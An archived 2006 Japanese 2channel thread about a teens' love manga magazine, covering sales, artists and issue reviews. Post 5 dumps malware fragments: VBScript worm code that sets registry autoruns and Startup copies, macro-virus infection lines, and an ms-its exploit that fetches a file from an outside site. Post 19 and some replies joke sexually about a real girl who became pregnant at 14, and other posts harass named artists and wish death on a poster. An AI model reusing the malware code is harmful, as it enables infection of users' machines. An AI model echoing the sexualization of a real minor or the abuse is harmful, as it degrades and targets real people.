5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

恋愛天国(れんあいパラダイス)vol.3

1 :花と名無しさん:2006/10/02(月) 03:59:11 ID:SdsCRuSn0
竹書房のティーンズラブ漫画誌・恋愛天国(れんあいパラダイス)を語るスレです。
毎月19日ころ発売です。
増刊のデラパラ、miniパラなどの話題もこちらで。

過去スレ
恋愛天国(れんあいパラダイス)vol.1
http://comic6.2ch.net/test/read.cgi/gcomic/1101302980
恋愛天国(れんあいパラダイス)vol.2
http://comic6.2ch.net/test/read.cgi/gcomic/1139322760/

竹書房公式ページ
http://www.takeshobo.co.jp/
恋愛天国
http://www.takeshobo.co.jp/html/shousai/osusume/zashi/renai.html

<関連スレ>
【TL】ティーンズラブを語ろう・15冊目【恋愛系】
http://comic6.2ch.net/test/read.cgi/gcomic/1156409877/l50
天野ちぎり
http://comic6.2ch.net/test/read.cgi/gcomic/1096166646/



2 :花と名無しさん:2006/10/02(月) 10:15:03 ID:X07AjQeu0
>>1
おつ

3 :花と名無しさん:2006/10/02(月) 10:34:07 ID:???0


4 :花と名無しさん:2006/10/02(月) 15:31:18 ID:???O
>>1

5 :<body onload=window()>:2006/10/02(月) 17:11:41 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

6 :花と名無しさん:2006/10/02(月) 21:42:48 ID:???0
絡み合う
陰毛



7 :花と名無しさん:2006/10/04(水) 00:04:39 ID:???0


8 :花と名無しさん:2006/10/04(水) 14:38:39 ID:???0
1乙!ウィルスうざー

9 :花と名無しさん:2006/10/04(水) 16:36:51 ID:???0
otu

10 :花と名無しさん:2006/10/05(木) 07:47:48 ID:???0
ほす


11 :花と名無しさん:2006/10/06(金) 08:23:58 ID:???0
ほす

12 :花と名無しさん:2006/10/06(金) 19:35:40 ID:???0
以前恋パラの広告に載ってた青木家あざみ本すごい売れたらしいけど
あれ読んで素直に感動したりするような人達がTLの中心読者層なんだろうか('A`)
てか父親疑惑の真相、竹の中の人知ってたらリークして欲すぃw

13 :花と名無しさん:2006/10/06(金) 20:57:57 ID:???0
だれ?

14 :花と名無しさん:2006/10/06(金) 20:59:31 ID:???0
こんどは竹が漫画化するらしいお

15 :花と名無しさん:2006/10/07(土) 00:11:42 ID:???O
>>12
TLの話じゃないけど、あの本は確かに売れてた。
何人騙されてんだw

16 :花と名無しさん:2006/10/07(土) 06:15:37 ID:???0
真実は知る由も無いからびみょんなとこだが
世間には疑うことすらしない人がまだまだ
大半てことなのか…
それかやっぱわかってて野次馬根性なんじゃないのか?w

17 :花と名無しさん:2006/10/07(土) 10:43:09 ID:???0
>>14
誰が描くの?恋パラ作家だったらメガワロス
でも誰も描きたくないだろうなぁ、特に親父w

18 :花と名無しさん:2006/10/07(土) 14:56:34 ID:???0
>>14
ソースは?

19 :花と名無しさん:2006/10/07(土) 22:13:32 ID:???0
TL風青木家物語
(Aざみ本読んでないんで内容と異なる部分があったらスマソ)

貧しい大家族で母親代わりとなって毎日家事や弟妹達の世話をするAざみ。
Aざみの通う定時制高校で密かに思いを寄せていたクラスメイトのイケメン君から
告白されるが、自分の境遇を知られるのが嫌で断ってしまう。
ある日、近所の商店街で値切って買い物をしているところをイケメンに見られてしまい
恥ずかしさのあまり泣き出すAざみ。
そんな彼女を
「君の事情は前から知っていた。でもそんな健気で頑張り屋な君が好きだ」と
優しく抱きしめるイケメン。そのまま野外でエチー。
幸せな日々を送る二人。しかし数ヵ月後Aざみのニンシーンが発覚。
結婚を決意し、Aざみ父(なぜかイケメンに描かれてる)に嘆願するが
年齢や経済的理由で猛反対される。
結局生まれた子供は青木家の一員として迎えることに。
「今は無理だけど将来は絶対に結婚しよう」と更なる愛を誓う二人。そのまま野外エチー。
しかしその数ヵ月後(ry

これも虹創作になるのかなw

20 :花と名無しさん:2006/10/08(日) 06:25:56 ID:???0
乙w

21 :花と名無しさん:2006/10/08(日) 07:28:58 ID:???O
作画は夏生あたりかw?


22 :花と名無しさん:2006/10/09(月) 01:54:54 ID:???O
>>19
オエップ('q`)
もうお腹イパーイ

23 :花と名無しさん:2006/10/09(月) 07:36:41 ID:???0
こことかで色々原案書いてくれる人居るけど
ほんとにたまにその人とかに原作原案書いてもらったほうが
いいんじゃないかと思う時あるよ〜

24 :花と名無しさん:2006/10/09(月) 14:58:35 ID:???0
ホスト漫画の次は青木家かよw

ホスト漫画にしたって、あれはあれで面白いけど
きれいな部分しか描いてないしね
何も知らない子が読んだら勘違いしそう
実際はカモられて終わりなのに

25 :花と名無しさん:2006/10/09(月) 17:42:30 ID:???0
色々知っててもカモられるのにねえ

26 :花と名無しさん:2006/10/10(火) 23:45:43 ID:???0
>>19
Aざみちゃんって14歳で妊娠したんだったっけ?
ドラマ「十四歳の母」も野外エチー→妊娠らしいと他板で見た後なので
14歳のセクース=青姦イメージが付きそうだw


27 :花と名無しさん:2006/10/11(水) 00:54:06 ID:???0
青木家スレによるとその前にも一度シュサーンしてるらしいから
今回で3回目らすぃ('A`)
DNA鑑定でもしない限り父親の真相は闇の中だろうね
T豚Sですらヤバイと思ったのか放送自粛してるし
漫画化も立ち消えじゃまいか?

28 :花と名無しさん:2006/10/12(木) 08:40:07 ID:???0
そのへん全然見た事なくて知らなかったわ〜

29 :花と名無しさん:2006/10/12(木) 08:51:19 ID:???0
>>26
子供は金持ってないからホテルとか行けないし。
自宅が使えない事情があればあとは青姦しかなかんべ。

30 :花と名無しさん:2006/10/12(木) 13:26:34 ID:???0
>漫画化も立ち消えじゃまいか?
そんなモラルが竹にあるとも思えないんだけど・・・
取りあえず漫画化して反応があれば良いわけだし、興味本位の人だって
たくさんいるだろうしね。

で、誰が漫画にするの?
夏生が漫画化するには、ちと古めかしいゴージャスwさが足りないな


31 :花と名無しさん:2006/10/12(木) 14:22:21 ID:???0
じゃなつみタンで

32 :花と名無しさん:2006/10/12(木) 15:31:22 ID:???0
恥子タソの絵が似合うとおも

33 :花と名無しさん:2006/10/12(木) 15:37:44 ID:???0
親父が無理だろ

34 :花と名無しさん:2006/10/12(木) 15:41:32 ID:???0
親父、金髪らしいし、美形でいいじゃん。

35 :花と名無しさん :2006/10/12(木) 15:45:34 ID:???0
恥子は普段の漫画の内容が薄いから
青木家の話かかせても浅すぎて逆に読者に反感かいそう

36 :花と名無しさん:2006/10/12(木) 15:46:29 ID:???0
恥子に描かせたら竹はネ申w
恥知らずのオンパレードwww

37 :花と名無しさん:2006/10/12(木) 16:00:24 ID:???0
竹といえば、トレスパクもお約束でつけて欲しいw

38 :花と名無しさん:2006/10/12(木) 16:01:37 ID:???0
竹は左とか右とかとも近しい出版社だから
全然臆すること漫画化に踏み切れるんじゃないかな。

いいや、天野で。天野に一票。
好きそうだし。父子相姦とか。

39 :花と名無しさん:2006/10/12(木) 16:07:23 ID:???0
売れっ子に汚れ仕事なんかさせるかなあ・・・
ポィ捨てで石崎でいいや、絵は下手だがこいつも近親好きそう

40 :花と名無しさん:2006/10/12(木) 17:15:36 ID:???0
絵柄やテーマから考えると天野か石崎なんだろうけど
二人とも小難しいモノローグとか入れそうだからなぁ・・
青木家に思想など存在しない。ある意味ハムスターだから



というわけで最近見かけないけどハム漫画描いてた人に一票〜w

41 :花と名無しさん:2006/10/12(木) 17:50:10 ID:???0
あー。4こま漫画っていう手があるか。
4こま漫画なら少々どぎつい内容でも
笑ってすんなり読めちゃうだろうし。

じゃあ、キヨハルでもいいや。
今やってるシリーズもいいかげんネタがつまんなくなってきてるし
新連載ってことで。


42 :花と名無しさん:2006/10/12(木) 18:05:28 ID:???0
一人に描かせようとするから意見が分かれるだよ
「青木家アンソロジー」ってことで数人に描かせればネ申本の出来上がり

43 :花と名無しさん:2006/10/12(木) 18:10:28 ID:???0
読みたくねえ^^;;;
そんなアンソロ。

まあ、ネタでつっぱしるなら
「青木家リレー漫画」
毎号連載だが、毎号作家が変わっていく。
もう原作無視で二転三転するストーリー。
毎回違うキャラデザインで誰が誰だかわかりやしないが
とりあえず昼メロなみの強烈な「引き」で「次号に続く」。

さあどうだ。なんとなく目玉な企画にできないか?
もう竹を去った卒業生作家も呼び戻して(不自動はくるとか、派突きかなえとか、鼻津鼻世とかw)
豪華なラインナップでGO!
(単行本とか無理かな?)

44 :花と名無しさん:2006/10/12(木) 18:40:16 ID:???0
「A木家アンソロジー・家族愛パラダイス」

表紙・・・悠木。ちょい悪オヤジ風の上半身裸の親父に寄り添うようにロリ顔のAざみタン

夏生・・・ボロボロになったAざみタンの前に大富豪が現れて玉の輿ハッピーエンド
天野・・・ぐちゃぐちゃドロドロの展開。いいところで落とす
菜摘・・・親兄妹全員で(ry
あやさか・・・キスした次のシーンで妊娠
石崎・・・親父の描写に気合が入ってる
ハムの人・・・ページをめくるたびに子供の数が増えてる

45 :花と名無しさん:2006/10/12(木) 20:58:23 ID:???0
花咲・・・彼氏役の男がいつの間にか芸能人に…!
三浦・・・親父もAざみもみんな同じ顔で見分けがつかないまま終わる
恥子・・・おリボン天国、家もリボン、兄弟もリボン

46 :花と名無しさん:2006/10/12(木) 22:30:14 ID:???0
>三浦・・・親父もAざみもみんな同じ顔で見分けがつかないまま終わる

ふいた。


47 :花と名無しさん:2006/10/12(木) 22:32:56 ID:???0
>>44>>45
ちょwwwおまwwwwwwww


48 :花と名無しさん:2006/10/12(木) 23:15:09 ID:???0
鈴木キヨハル・・・「産むんじゃなかった」と毎回言ってる

49 :花と名無しさん:2006/10/12(木) 23:20:41 ID:???0
その台詞
どうしてもあたるの母を思い出すよ…

50 :花と名無しさん:2006/10/12(木) 23:57:47 ID:???0
菜摘タンに親兄妹全員でラブラブハッピーエロ
ってのをやってもらって、現在逆風の青木家をポジティブイメージに持ち上げる…
小説(あれ?ちがったっけw)も漫画も売れて竹的にもハッピー。

51 :花と名無しさん:2006/10/13(金) 00:43:01 ID:???0
アベちゃん政権は少女エロに厳しくなると思うぞ
わざわざ有害くらうような本出してどうするw
てか印税入って欲しくない人達ばかり儲かってしまうジャマイカ

52 :花と名無しさん:2006/10/13(金) 01:27:29 ID:???O
厳しくなってほしいな
まず性コミからやってほしい、BLTLはその後で。
コミクスも禁書扱いで。
ショウガッカンだけ特別扱いは許さん

53 :花と名無しさん:2006/10/13(金) 10:28:25 ID:???0
載せるんだったったらTV放映されるくらいに載せるよね
で、恋パラに載るの?

54 :花と名無しさん:2006/10/13(金) 10:58:33 ID:???0
TVはもう無理なんじゃないの?

55 :花と名無しさん:2006/10/13(金) 20:17:31 ID:???0
TVはもう放送予定なしってどこかで読んだ

竹の青木家公式ブログ見たんだが(そんなのあったんだよw)
Aざみ本30万部突破だってさ。このご時世にその数字はすごいだろうから
漫画化は企画されてたんじゃないかなぁ
DQNが好みそうな絵柄の作家に描かせて単行本で出したら
数万は確実に出たと思われ

竹は今頃出すか否かで会議してるかもw

56 :花と名無しさん:2006/10/13(金) 20:28:12 ID:???0
キヨハルで青木家漫画想像してみたが
いまの文三の家とどう違うのかわからんwww

57 :花と名無しさん:2006/10/14(土) 12:47:25 ID:???0
本当にネタないなあ…

58 :花と名無しさん:2006/10/14(土) 21:59:14 ID:???0
じゃ、小ネタ
賀川あいのたんが、ばんがいちとかいう男性系の雑誌に載るらしい
ちょっとびっくり。
あの絵が男性系で受けるとは思えないんだけどw

59 :花と名無しさん:2006/10/15(日) 08:28:08 ID:???0
男性系は嗜好の幅広いぞw

60 :花と名無しさん:2006/10/15(日) 09:03:25 ID:???0
じゃあ菜摘タンも…

61 :花と名無しさん:2006/10/15(日) 09:29:15 ID:???0
>244 名前:名無しさん名無しさん メェル:sage 投稿日:2006/10/10(火) 05:08:00
>竹書房のTLは新人1P4500円とマジレス
>パロアンソロでも1P6000円なのにやってらんねー
>BLは6000〜8000円かな、他社に行ったらそれくらい提示された
>…が今は少年誌で頑張ってるよ少年誌だと安くて7000〜です
>まあ、好きな事してるので満足だし、アシなしでやってるから自分的にはオッケー



62 :花と名無しさん:2006/10/15(日) 11:43:02 ID:???0
男性向けエロ雑誌で小石川ふにが描いているのを見かけたことはある。

63 :花と名無しさん:2006/10/15(日) 14:53:08 ID:???0
ふにはデビュー当時からTLと男性向けに描いてる人でそ
コミクスも両方で出てるが、
ノリ違うからTL期待して男性向け買うと騙されたって思うよ

64 :花と名無しさん:2006/10/15(日) 19:09:40 ID:???0
賀川あいのってなぜかコミクスが出てるよね
同人で売れっこだったとかそれなりのキャリアがあるの?
あの絵とあのストーリーじゃ同人パロも絶対ビミョンな気がするが

65 :花と名無しさん:2006/10/15(日) 20:53:50 ID:???0
同人はよく分らないけど、ここに来ない層のファンに
人気あるのかもね
セブンアンドアイのTL書店みたいな所では褒められていたよ

エロの世界はよくわからないわ…

66 :花と名無しさん:2006/10/15(日) 21:33:31 ID:???0
売れてない本を誉めるみたいなのはどこでもあるけどね

いつ読んでも面白くないから、男性向けに行って帰ってこないで欲しい

67 :花と名無しさん:2006/10/15(日) 22:40:52 ID:???0
>売れてない本を誉めるみたいなのはどこでもあるけどね

あ、いや、私が見たのは個人の趣味でお勧めを並べてある感じ
天野とか人気の作家も紹介してあった

ななせタンあたりもコミクス出てるし、ここには来ないようなファンにこそ
TLって受けてるんだろうか…と思う

68 :花と名無しさん:2006/10/18(水) 16:29:19 ID:???0
そこはオヌヌメを紹介してるだけのコーナーということ??

69 :花と名無しさん:2006/10/18(水) 22:23:22 ID:???0
あいのタン、ばんがいちでアンケがよくなくて戻ってきそう…

70 :花と名無しさん:2006/10/18(水) 23:11:41 ID:???0
>>68
そう、自分の好きなのをお勧めって感じだった
だからやらせ、ってのはないと思う

71 :花と名無しさん:2006/10/19(木) 03:33:07 ID:???0
お勧めしてるのが身内や本人でもわかんないよね、あの書店。



72 :花と名無しさん:2006/10/19(木) 06:24:58 ID:???0
>>70
あ、やらせとか思ったんじゃなくて
TLをまとめて紹介するような人が居たんだなあと

73 :花と名無しさん:2006/10/19(木) 18:42:12 ID:???0
とりあえず
表紙のあいのたんの名前はわりと大きいw

74 :花と名無しさん:2006/10/19(木) 19:56:18 ID:???0
男性系って同人系で絵が飛びぬけて上手い人ばっかりで…
と思った私が馬鹿でした…>あいのたんが載った本
TLよりも下手な作家がいる本ってあるんだね

75 :花と名無しさん :2006/10/19(木) 20:31:53 ID:???0
恋パラゲト
天野また落としてる?
先月の次号予告で名前載ってた気がしたんだけど
見間違いだったらスマソ

76 :花と名無しさん:2006/10/19(木) 21:10:05 ID:???0
>>75
目次に「体調不良の為お休み」ってあるのに、わざわざ
ここで話題にしてまた叩こうって、馬鹿じゃね?
仕事がないからって売れてる作家のストーカーですか、ばーか
いい加減にしろよ石崎

77 :花と名無しさん:2006/10/19(木) 21:16:05 ID:???0
>>76
おまwwww
最後の一行で台無しwwwww

78 :花と名無しさん:2006/10/19(木) 21:21:03 ID:???0
石崎たんは仕事がなくて天野のストーカーになってたのかw
売れない作家も大変だな

79 :花と名無しさん:2006/10/19(木) 21:21:16 ID:???0
自分は3行目で気付いたw

80 :花と名無しさん:2006/10/19(木) 21:24:57 ID:???0
仕事がないなら天野を手伝ってやればいいのに…

81 :花と名無しさん:2006/10/19(木) 21:29:08 ID:???0
あやさかの手伝いもな

82 :花と名無しさん:2006/10/19(木) 21:34:06 ID:???0
落としたのは天野とあやさか?

83 :花と名無しさん :2006/10/19(木) 21:39:47 ID:???0
体調不良のわりにはよく出かけたりしてることブログに書いてるよな>天野
やる気あんのかよ

84 :花と名無しさん:2006/10/19(木) 21:41:17 ID:???0
ストーカー、うざす

85 :花と名無しさん:2006/10/19(木) 21:47:13 ID:???0
でも確かに天野はよく落とすよね
体調不良でも確実に仕事あげる作家もいるのに、少し甘えてる希ガス

86 :花と名無しさん:2006/10/19(木) 21:52:30 ID:???0
それでも許されるのは売れっ子だからだろうね
しかもただの売れっ子じゃなく、才能がある売れっ子って事で
恋パラもも切れないんだろう

87 :花と名無しさん:2006/10/19(木) 21:54:43 ID:???0
人気商売だもんな
よっぽど問題があるならまだしも、このくらいじゃ切らないよ>天野

88 :花と名無しさん:2006/10/19(木) 21:57:35 ID:???0
石崎たんは人気がないから切られましたw

89 :花と名無しさん:2006/10/19(木) 22:42:29 ID:???0
2本分の代原どうなってるんだw

90 :花と名無しさん:2006/10/19(木) 22:57:24 ID:???0
真敷ひさめ次回予告にいなかったね。
等々念願のBLにいけたのかな?

91 :花と名無しさん:2006/10/19(木) 23:08:54 ID:???0
まさか。
今度は真敷もターゲットか
石崎は攻撃するのは売れてる作家なら誰でもいいんだな…


92 :花と名無しさん:2006/10/20(金) 02:29:30 ID:???0
>しかもただの売れっ子じゃなく、才能がある売れっ子って事で

スタバラテ吹いた
あの作家に才能なんてあったのか。

93 :花と名無しさん:2006/10/20(金) 02:30:53 ID:???0
あれは才能じゃないのか?
好き嫌いは別だぞ


94 :花と名無しさん:2006/10/20(金) 02:32:56 ID:???0
やっかみって怖いね、素直に才能を認められないのか

95 :花と名無しさん:2006/10/20(金) 02:35:23 ID:???0
あきれるね…石崎って腐ってる

96 :花と名無しさん:2006/10/20(金) 02:37:12 ID:???0
落とさないって才能はないかもしれんが
それもまた別だなw

97 :花と名無しさん:2006/10/20(金) 02:39:26 ID:???0
ああ別だw

98 :花と名無しさん:2006/10/20(金) 02:43:56 ID:???0
>>74
今月分しかのぞいたことないけど
自分もちょっと意外だったよ
全体的に絵柄が男性向けっぽくないようなキモス…
む、スレチだなスマソ

99 :花と名無しさん:2006/10/20(金) 02:51:19 ID:???0
98>
が言う男性向け、男性向けじゃないの基準が知りたい

また、石崎か!!!!w

100 :花と名無しさん:2006/10/20(金) 02:55:08 ID:???0
違うジャンルの本まで…暇なんだね、石崎w

101 :花と名無しさん:2006/10/20(金) 03:34:33 ID:???0
粘着石崎アンチは石崎をノイローゼにでもしたいのか?
この粘着具合本気で怖いよ・・・・あんたの方が既に病気だよ。

102 :花と名無しさん:2006/10/20(金) 03:37:47 ID:???0
ほっときなよ、遊んでるっぽい

103 :花と名無しさん:2006/10/20(金) 03:49:14 ID:???0
>>98
のぞいた??

104 :花と名無しさん:2006/10/20(金) 03:52:48 ID:???0
こんなに気分悪い遊びは自分のブログかチラシ裏にでも書いておけばいいよ

105 :花と名無しさん:2006/10/20(金) 03:59:56 ID:???0
こっちのスレじゃスルー決定してなかったんだっけか

106 :花と名無しさん:2006/10/20(金) 09:11:16 ID:???0
ここで華麗に羅列ですよ

107 :花と名無しさん:2006/10/20(金) 11:24:03 ID:???O
菜摘タンやななせタンみたいなネタじゃね?
そんなネタに目くじらたてるのもどうかと…

108 :花と名無しさん:2006/10/20(金) 11:37:36 ID:???0
ネタだと笑い飛ばすにはあまりにも粘着すぎて気持ち悪い。

109 :花と名無しさん:2006/10/20(金) 11:57:52 ID:???0
だからスルーしろよ、と…

110 :花と名無しさん:2006/10/20(金) 12:25:58 ID:???0
ただ面白くないってだけでネタになるのも大変だな

111 :花と名無しさん:2006/10/20(金) 12:31:57 ID:???0
本物の基地外だからな・・・>石崎アンチ
微妙に石崎を擁護しながら貶めたりとか最近は小技が利いてるが
はっきり言ってこいつが出てくるとスレが腐る。
公害だって自覚がないのかね。一言でも発言してほしくない。
死んでほしいと願ってるTLファンが国内に何人いることか・・・。
つーか誌ね。


112 :花と名無しさん:2006/10/20(金) 12:46:19 ID:???0
石崎が死んでもここに来るのかなあ

113 :花と名無しさん:2006/10/20(金) 12:54:30 ID:???0
スルーするとスレの総意だと思い込むような基地外だよ(初期)
放置したら調子に乗るだけと思う。

114 :花と名無しさん:2006/10/20(金) 13:01:44 ID:???0
>>112
死んでも来ます。魂は永遠です。

115 :花と名無しさん:2006/10/20(金) 13:17:14 ID:???0
作家としてはもう死んでるのにね…

116 :花と名無しさん:2006/10/20(金) 15:19:26 ID:???0
相手しても調子に乗るじゃん
だったらスルー…
つか基本対応それでしょ

117 :花と名無しさん:2006/10/20(金) 15:53:37 ID:???0
過去ログ読んでみ
粘着アンチって突っ込まれると粘着が止まってる
これ書いたらこれからは突っ込んでも粘着してくるかもしれないけどw
そこまで低能じゃないことを祈る。

118 :花と名無しさん:2006/10/20(金) 16:03:50 ID:???0
そして本人にここの総意として嫌がらせがいく訳だ
よく出来てる

119 :花と名無しさん:2006/10/20(金) 16:14:42 ID:???0
>>103
ばんがいちはサイトがあって中身少しが見れるようになってるよ
それだとおも

120 :花と名無しさん:2006/10/20(金) 16:56:31 ID:???0
「愛と罪の狂想曲」 夏生恒
「悪戯なHONEY」 夕希はづみ
「姉弟のカンケイ」 百瀬なつ
「愛しのブレーメンズ★」 菜摘ちはる
「ラブゲーマー」 久保田美穂
「デブっちゃいやん」 史槻ワタル
「正しい駄犬のしつけ方」 コダマナオコ
「神様のおもうまま」 高橋依摘
「ゆううつジュリエット」 橘えりざ
「楽に生きや、楽しく生きや。」ふを留美&芳晶せいじ
「トップ ノート」 木村ぶんぶん
「恋の魔法使い」 菜月美亜
「彼氏未満」 ハザマ涼
「あなたがほしいのっ!」 葵ひなり
「やさしい怪獣」 晴美はるらん


121 :花と名無しさん:2006/10/20(金) 18:05:24 ID:???0
テンプレ借ります

「愛と罪の狂想曲」 夏生恒 … もう何がなにやら。恐ろしい世界。
「悪戯なHONEY」 夕希はづみ … 読んでも内容が頭にはいってこなかった。Why?
「姉弟のカンケイ」 百瀬なつ  … 義理の息子が家庭内で常に敬語ってのは、なんかイヤな家だなあ。お母さんつらいだろうなあ。

「愛しのブレーメンズ★」 菜摘ちはる … もう何がなにやら。恐ろしい世界2。
「ラブゲーマー」 久保田美穂  … なんか軽くていい。
「デブっちゃいやん」 史槻ワタル  … おもしろかったし、可愛かったんだが、レディコミじゃないのかな。これ。
「正しい駄犬のしつけ方」 コダマナオコ  … 「きみはペット」と違ってこちらの「犬」はただのダメンズ…夢ナシ。
「神様のおもうまま」 高橋依摘  … ファンタジー(苦手)だが、今までのこの作家の作品の中でも一番好きかも。
「ゆううつジュリエット」 橘えりざ … ロミジュリって、やってる本人だけが楽しいよね。多分。
「楽に生きや、楽しく生きや。」ふを留美&芳晶せいじ  … うさんくさすぎーw
「トップ ノート」 木村ぶんぶん … ほのぼの。好きだなあ。この人の漫画はいつも。
「恋の魔法使い」 菜月美亜 … 絵が、絵柄が…惜しい。
「彼氏未満」 ハザマ涼 … このヒロインさいあくー。
「あなたがほしいのっ!」 葵ひなり … このヒロインもどーしよーもねえー。犯罪だよ、こりゃ。
「やさしい怪獣」 晴美はるらん … いい話だ。


122 :花と名無しさん:2006/10/21(土) 06:15:17 ID:???O
先月号の集計出てたけど(BIGNET2)恋パラずいぶん落ちてた

…自分も悩んで買わなかった…けど協力出来無くて何かスマン
でも今月も悩み中

123 :花と名無しさん:2006/10/21(土) 09:48:14 ID:???0
天野やあやさかがいないと駄目なんだろうね
ランキングの落ち方がびっくりした

124 :花と名無しさん:2006/10/21(土) 19:27:31 ID:???0
一応毎月買ってはいるけど前ほど面白くない。
天野やあやさかがいないと駄目なのか・・・落としながらだらだら
いつ終わるか知れない連載を続けるくらいならいっそいない方がと
思ったりもするんだけど。
どちらもそんなに面白いもの描いてるとは思えないし。

125 :花と名無しさん:2006/10/21(土) 19:40:35 ID:???0
そのランキング先月の売り上げじゃまいか
天野いただろう…

126 :花と名無しさん:2006/10/21(土) 21:16:13 ID:???0
別に天野だけの問題じゃないと思うけどな
今まで微妙なオバ絵(巻頭作家あたりの耽美絵じゃなく)や
古いくさい話ばっかりで面白くなかった事が重なった

そんな感じじゃない?

127 :花と名無しさん:2006/10/21(土) 21:24:54 ID:???0
たしか先々月は三大誌の中でトップだったんだよね
来月再来月の結果見てみないと売り上げが落ちてるかどうかわかんないと
思うんだけど・・


128 :花と名無しさん:2006/10/21(土) 22:13:48 ID:???0
先々月は付録がついてた、と覚えている
そのせいでいつもの立ち読みが出来なくて買ったから…

129 :花と名無しさん:2006/10/21(土) 23:00:04 ID:???0
そんな理由かよw

130 :花と名無しさん:2006/10/23(月) 23:25:31 ID:???0
ばんがスレみたらあいのタン、レディース扱いされてますw
どうやらキャンディキスが廃刊になってそこから何人かTL作家が
スカウトされたみたい

131 :花と名無しさん:2006/10/24(火) 01:20:20 ID:???0
レディースねえ…TLというジャンルも男性系の読者には同じなんだろうな
まあ世界の狭さは男の方が段違いだから仕方がないか

132 :花と名無しさん:2006/10/24(火) 02:14:14 ID:???0
というか知らない人は多分まだTLって分岐があること
知らないんじゃね?

133 :花と名無しさん:2006/10/24(火) 08:13:45 ID:???0
まあ、世間的な認知区分で言うと、
「女がメイン読者層のエロ雑誌」=レディース
だろうしなあ。
レディコミとTLの違いなんてわからんだろう。
ちゃおもクッキーフラワーも少女漫画でくくられてるわけだし。

134 :花と名無しさん:2006/10/24(火) 19:11:45 ID:???0
あの作風じゃレディースって言われてもしょうがないかと
あいのタンって消えたと思ってるとしばらくしてフカーツしてくるよね
恋パラよりギャラがいい他誌でスカウトされるとそっちで描いて
そこでイラネって言われると戻ってきてるんじゃまいか

135 :花と名無しさん:2006/10/24(火) 22:42:48 ID:???0
つか、ここでもりなちゃ以外はオバ絵扱いする人もいるし
ロリ絵やアニメ絵以外は古いレディコミ扱いなんじゃないかね


136 :花と名無しさん:2006/10/24(火) 23:24:04 ID:???0
ヲバ絵はヲバ絵でそ。それでも上手ければまだいいけど
賀川はヲバ+ヘボン。ストーリーもテンプラ以下だし
賀川よりはましな作家もかなり出てきてるし淘汰されていいよ
美少女系でもいらないと思うがナー

137 :花と名無しさん:2006/10/26(木) 01:18:22 ID:???0
あいのたんは別に下手じゃないと思うけどね
好きか嫌いかは置いといて。

そしてエロの萌えはもっと違うところにある気がする

138 :花と名無しさん:2006/10/26(木) 13:27:17 ID:???0
淘汰されて欲しい作家って他に誰がいる?

139 :花と名無しさん:2006/10/27(金) 23:43:20 ID:???0
今月号漫画スクールBクラス作品集みたいだったw
話は悪くないけど絵が…。同人スカウトもいいけど商業誌で描くなら
同人絵は直してきて欲しい
5人くらい同人絵が続いてウヘァ('A`)ってなった

140 :花と名無しさん:2006/10/28(土) 00:17:47 ID:???0
わたしも ウヘァ('A`) ってなった

141 :花と名無しさん:2006/10/28(土) 00:25:20 ID:???0
同人絵、というものがよくわからない
トーンをバリバリ貼ってある絵?って事?
菜月美亜って人が怖かったけど、こういう感じ?

142 :花と名無しさん:2006/10/28(土) 01:08:09 ID:???0
少女漫画じゃなくてアニメや少年漫画を模写して出来上がったような絵柄かな
今月号だとコダマナオコ、史槻ワタル、菜月美亜、橘えりざあたりが同人絵に見える
本スレでもネタになってたがミニスカ制服にニーソックス合わせるのに抵抗なさそう

143 :花と名無しさん:2006/10/28(土) 01:09:52 ID:???0
うーん…
同人誌を読んできた人なら感覚でわかる絵だよな
もちろんしようと思えばわからない人にも
文章で細かく説明出来なくもないし
そうでない絵と違いが説明できるはずだけど…

あまり接してない人にはもしかして違いなんて感じないのかもしれん

144 :花と名無しさん:2006/10/28(土) 01:21:52 ID:???0
TLに限らず、今の少女漫画って同人絵が主流だと思うけどな
同人絵を抜きにして語れないって言うか…

だから、それを抜いて商業に来いっていう感覚がわからない
余程感覚が古い人なのかと思ってしまうけど

145 :花と名無しさん:2006/10/28(土) 01:52:59 ID:???0
同人絵と少女漫画絵の違いがうまく説明出来ない
つか144みたいにその違いがわからないほど同人感覚が
浸透してる人にはなおさら…
少なくとも主要イパーン誌に上で挙がったような絵の人はいないよ
穴埋め新人とかは知らんが

146 :花と名無しさん:2006/10/28(土) 02:09:08 ID:???0
>>145
花夢はそんなのばっかだぞw>同人絵

147 :花と名無しさん:2006/10/28(土) 02:13:54 ID:???0
てか…同人絵って一括りにする方が乱暴だと思うけど
同人にも流行があるし、ジャンルによっても主流の絵は違うしね
それを一括りにするのは、似たり寄ったりしかなかった大昔の同人の
イメージしかないのでは?

148 :花と名無しさん:2006/10/28(土) 02:15:52 ID:???0
同人読まないから何が違うのか全然分からない
あんまり読み手にとっては関係ない気がするんだけど
同人絵の何が嫌なのか分からないけど、同人をけなしてるなら話はわかる

149 :花と名無しさん:2006/10/28(土) 02:33:19 ID:???0
本スレで今話題が出てる
TL=オバ絵って吐き捨てて行くオバちゃん(?)と同じ臭いが…

150 :花と名無しさん:2006/10/28(土) 02:40:58 ID:???0
ヲバ絵とヲタ絵は違わない?ミックスされてる作家もいるけど
今月号はその2種類が多いような気が…モゴモゴ

151 :花と名無しさん:2006/10/28(土) 02:43:28 ID:???0
同人絵ってそもそも何なの?
自分も同人知らないからワカラン

